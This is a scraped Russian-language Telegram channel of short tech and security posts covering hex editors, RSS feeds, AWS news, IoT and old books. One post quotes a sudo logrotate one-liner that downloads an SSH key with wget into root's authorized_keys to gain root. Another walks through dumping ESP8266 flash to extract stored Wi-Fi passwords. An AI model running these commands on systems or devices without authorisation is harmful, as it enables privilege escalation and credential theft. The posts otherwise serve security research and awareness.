Cult Of Wire
950 subscribers
206 photos
2 videos
37 files
1.13K links
Мир проигравшего киберпанка.

Для связи: @the29a
Download Telegram
Журналов по кибер-безопасности много, а по физической безопасности почти ничего нет.

Почти.

Нашёл Journal of Physical Security, бесплатное онлайн-издание, посвященное физическим аспектам безопасности.

Выпусков мало, (выходят раз в год, пока что 15 штук, в этом году пока ничего нет), зато хорошие.
Искал медь, а нашёл золото.

Искал книги из далёкого прошлого: "Телевидение?.. Это очень просто!", "Радио?.. Это очень просто!" за авторством Евгения Айсберга и "Занимательная физика" за авторством Якова Перельмана.
Книги из периода 1960-1990 годов, разброс большой, но убил сразу двух зайцев.
- сайт с книгами publ.lib.ru. Это уже отдельно взятый артефакт из начала двухтысячных. Если вы не застали веб тех времен, вам стоит глянуть на этот монумент.
- Сами книги. Издания за разные годы, в куче вариантов. Очевидно, что большая часть в djvu, но оно того стоит.

Торрентом бы это всё утащить было бы отлично, но ничего похожего не нашёл.

P.S. Ссылки на книги, если кому-то интересно:
Телевидение?.. Это очень просто!
Радио?.. Это очень просто!
Занимательная физика. Книга 1.
Занимательная физика. Книга 2.
1
RSS формат старый, но ещё применимый. Если следите за новостями, нет необходимости лезть в браузер и листать ленту.

Выбрал фиды, закинул в ридер и всё.

Сделал небольшую подборку security-related RSS фидов:
- в блоге
- сырой markdown

P.S. Собрал пару фидов в wtfutil, вроде даже удобно.
👍2👏1
Устроим вечер hex-редакторов

Если вы не реверсер, то hex-редактор в вашем арсенале штука не самая важная, а по этой причине чаще используется то, что под рукой: hexedit, hexeditor, xxd.

Но hexedit хоть и функционален, но не очень удобен, hexeditor вызывает инфаркт глаз, а xxd хоть и хорош, но довольно красноглаз и уместен скорей в пайплайнах.

Сегодня посмотрим на несколько редакторов, достойных внимания.

GUI:
HexWalk
ImHex

CLI:
vim-hexedit
hexcurse
HexWalk - это кроссплатформеный Hex-редактор.

Основан на таких проектах с открытым исходным кодом, как qhexedit2, binwalk и QT.

Функционал:
- Advanced Find (поиск шаблонов в бинарных файлах на основе HEX, UTF8, UTF16 и regex).
- Интеграция с Binwalk
- Анализ энтропии
- Калькулятор хэшей
- Конвертер Bin/Dec/Hex
- Редактирование шестнадцатеричных файлов
- Diff-анализ файлов
- Byte Patterns для разбора заголовков

Для использования функционала binwalk, сам binwalk должен быть установлен. Для Linux достаточно установки из пакетного менеджера, в Windows уже свои особенности.

QT5 продолжает оскорблять чувства эстетов, но gui к binwalk это хорошо. (хоть и не критически необходимо).
ImHex - hex-редактор для серьезных ребят.
Как описывает автор: "A Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM."

Функционал богатый и поддерживает множество архитектур за счёт использования Capstone (ARM64 и MISP везде есть, но и пусть тут будет). А так же есть поддержка правил Yara.

Кроме того, расширяется плагинами прямо из самого редактора.

И тёмная тема по умолчанию, это довольно важно. И Wikipedia term definition finder.

А ещё можно пощупать ImHex онлайн тут.
🔥1
hexcurse - что-то попроще не вылезая из консоли.
hexcurse - малоизвестная классика среди hex-редакторов.
Стандартный, двухпанельный ncurses-редактор без особых изысков.

Не смотря на то, что проект заброшен (последний коммит от 2018), hexcurse вполне актуален и доступен в репозиториях.

Как и для всех инструментов, работающих в cli, стоит ознакомится с шорткатами.
👍1
vim-hexedit - плагин для VIM, который расширяет встроенные возможности.

Проект заброшен автором, работоспособность под вопросом.
Как и под вопросом необходимость hex-редактора в vim.
В прочем, это уже другая история.

Если пользователь vim может что-то сделать через vim, но именно так и поступит.
👍1
И наконец, самый простой вариант hexed.it - hex-редактор работающий в браузере.

Основной функционал на месте, если нужно посмотреть\изменить небольшой файл здесь и сейчас, то вполне себе вариант.
2
root with a single command: sudo logrotate

Вопрос: что может произойти, если пользователь может запустить только sudo logrotate?

Кажется, что если sudoers выглядит так
user ALL=(ALL:ALL) NOPASSWD: /usr/sbin/logrotate *
то проблем быть не должно.

Но путём хитрых манипуляций logrotate поможет получить root:
sudo logrotate -l /etc/cron.daily/man-db '2>/dev/null;wget host/ssh.key -O /root/.ssh/authorized_keys2; exit 0;'

Интересное исследование интересного вектора атаки. Советую почитать целиком.
👍5
Detect Wi-Fi deauthentication attack using ESP8266 and receive notification on smartphone

Как с помощью булки хлеба и отверток ESP8266 детектить deauth атаки на Wi-Fi и не привлекать внимания санитаров получать SMS-оповещения.

Автор использует DeauthDetector, немного расширяя его функционал.

Выглядит довольно своеобразно, но как PoC выглядит интересно.
👍1🫡1
ipapi.is: How to build a IP Geolocation Database from Scratch?
Интересный и довольно простой подход в сборе своей базы geoip:
собрали данные у региональных интернет-регистраторов, обогатили данные и получили продукт на выходе.

Сами базы geoip в открытом доступе и их можно скачать.
Пиджаки в облаках. AWS для ЦРУ.

AWS большой облачный провайдер, с множеством дата-центров, регионов, сервисов и множеством удобных вещей.
Но очевидно, что AWS это не только public cloud и free tier для VPN, но и множество вещей, скрытых от обычного пользователя.

Disclaimer
Данная статья не является “срывом покровов”, долгосрочным результатом работы кибер-разведки, или иной формой откровения. Это наглядный пример, что немалое количество информации можно получить просто почитав документацию и файлы конфигурации.
Это применимо не только к основному продукту, но и к сторонним инструментам.
Youtube решил довольно своеобразно бороться с блокировщиками рекламы.

Правда оно может не работать и с выключенным блокировщиком. ¯\_(ツ)_/¯

На r/uBlockOrigin нашли решение по обходу блокировки блокировщиков.
Небольшое исследование от Cloud Security Partners.

Около 5% процентов от их клиентов держат AWS RDS в публичном доступе. Да, процент довольно небольшой, но это отдельно взятый случай, фактически их куда больше.

Эта тенденция может не слишком распространена, но для многих пользователей о ней важно знать - особенно для тех, кто предъявляет строгие требования к соблюдению нормативных требований. Но в любом случае, суть статьи: держите вещи подальше от публичного Интернета, если они там не нужны. В большинстве случаев RDS это не требует.

RDS имеет несколько платформ баз данных (не только MySQL), которые могут выбирать пользователи, и среди них есть несколько различных поддерживаемых вариантов аутентификации, которые описаны в документации - Database authentication with Amazon RDS. Таким образом, угроза заключается не только в атаке с подбором пароля, но и в компрометации пользователя IAM или через компрометацию Kerberos. Ситуация с компрометацией учетных данных пользователя более вероятна.

Хотя URL-адрес экземпляра трудно угадать, его можно узнать просмотрев исходный код. Например, поиск us-west-1.rds.amazonaws.com в поиске кода на GitHub дает более 1.8k совпадений файлов и более 5k для us-west-2.rds.amazonaws.com. И при просмотре публичных (в частных наверняка тоже) репозиториев кода довольно часто встречаются строки подключения к базам данных.

Рекомендации:
- Проверяйте RDS на общедоступность
aws rds describe-db-instances --profile your-profile | jq -r ".DBInstances[] | select(.PubliclyAccessible == true)"
- По возможности развертывайте экземпляры RDS в том же VPC, что и серверы приложений.
- Если ресурсы невозможно развернуть в одном VPC, используйте пиринг VPC, чтобы обеспечить подключение к внутренней сети.
👍1
It's Alive!

Youtube-канал Androkavo ожил и после почти пяти лет молчания выпустил видео.
Если вы не понимаете, о чём я: Androkavo один из самых крутых каналов, посвященных пайке. Никакого бубнежа за кадром, только паяльник, припой, флюс и филигранная работа.
Если вы любите запах напалма припоя поутру, канал обязателен к просмотру.
AWS Digital Sovereignty Pledge: Announcing a new, independent sovereign cloud in Europe

Небольшая новость от AWS. Они запускают "суверенное облако" в Европе. Деталей в новости нет, но вероятно это и есть AWS ISOE (про который я писал ранее). У AWS много точек присутсвия (8 регионов и 24 зоны доступности) и казалось бы, что ничего нового. Но судя по всему, расчет идёт на более требовательную публику, вроде здравоохранения, банков и правительства.
Забытый IoT как способ попасть в сеть.

IoT штука удобная. Включать свет, двигать шторы, перекрывать воду и многое другое можно делать с телефона. Красота.
Разумеется, заботливые производители привязывают свои железки к своим облачным сервисам, а неблагодарные пользователи не хотят и прошивают купленные на свои кровные устройства кастомными прошивками.
Но, разумеется, и это перекрывает не все проблемы.

При наличии физического доступа к устройству можно извлечь имя точки доступа и пароль.
Рассмотрим на примере проекта WLED на ESP8266.
Нам потребуются:
1. Сам ESP8266
2. Программатор USB-UART (в моём случае будет Flipper Zero)
3. 4 соединительных провода
4. макетная плата (опционально)
5. esptool и pyserial (не обязательно он, мне так удобней смотреть порт USB-UART)

Подключаемся:
1. Подпаиваемся или ставим на макетку наш ESP8266.
2. Подключаем USB-UART
3. Проверяем, что порт на месте
pyserial-ports -v
/dev/ttyACM0
desc: Flippername
hwid: USB VID:PID=0333:4542 SER=flip_flippername LOCATION=1-1:1.0
1 ports found

4. Переводим плату в режим прошивки. Для этого нажимаем и удерживаем кнопку FLASH, нажимаем кнопку RST и отпускаем. После перезагрузки диод гореть не должен.
5. Опрашиваем ESP для проверки корректности работы:
esptool --baud 115200 --chip esp8266 --port /dev/ttyACM0 chip_id
Если всё сделано верно, мы получим информацию о плате.

6. Дампим прошивку:
esptool --baud 115200 --port /dev/ttyACM0 read_flash 0x00000 0x400000 flash2_4M.bin

6. По окончанию загрузки нам потребуется просто посмотреть строки в файле:
strings flash2_4M.bin| grep "psk"
strings flash2_4M.bin| grep "ssid"

И мы получаем имя точки доступа и пароль.

Да, я не могу назвать это каким-то сложным и полезным ресёрчем, но это показывает, что умные реле, лампочки и прочий IoT хранит пароли в открытом виде.
Для полноты картины надо будет проверить на других устройствах с родными прошивками, но тут уж как получится.

И не забывайте, s in IoT stands for security.
Хорошие новости подвезли.

У sshfs появился мейнтейнер и проект больше не orphaned.

Пока что обновился readme и начались хоть какие-то именения в коде.

Пока что радоваться особо нечему, но новость даёт надежды на продолжение жизни проекта.

Для тех, кто пропустил:
Предыдущий мейнтейнер Nikolaus Rath по каким-то своим причинам оставил проект в 2022, после чего проект оставался в "осиротевшем" состоянии.
А тут Scapy в браузере появился.

Есть ограничения:
- не работают функции ввода/вывода (send, sr, sniff и т.д.).
- Все, что использует внешние пакеты (matplotlib, pyx и прочее) не поддерживается.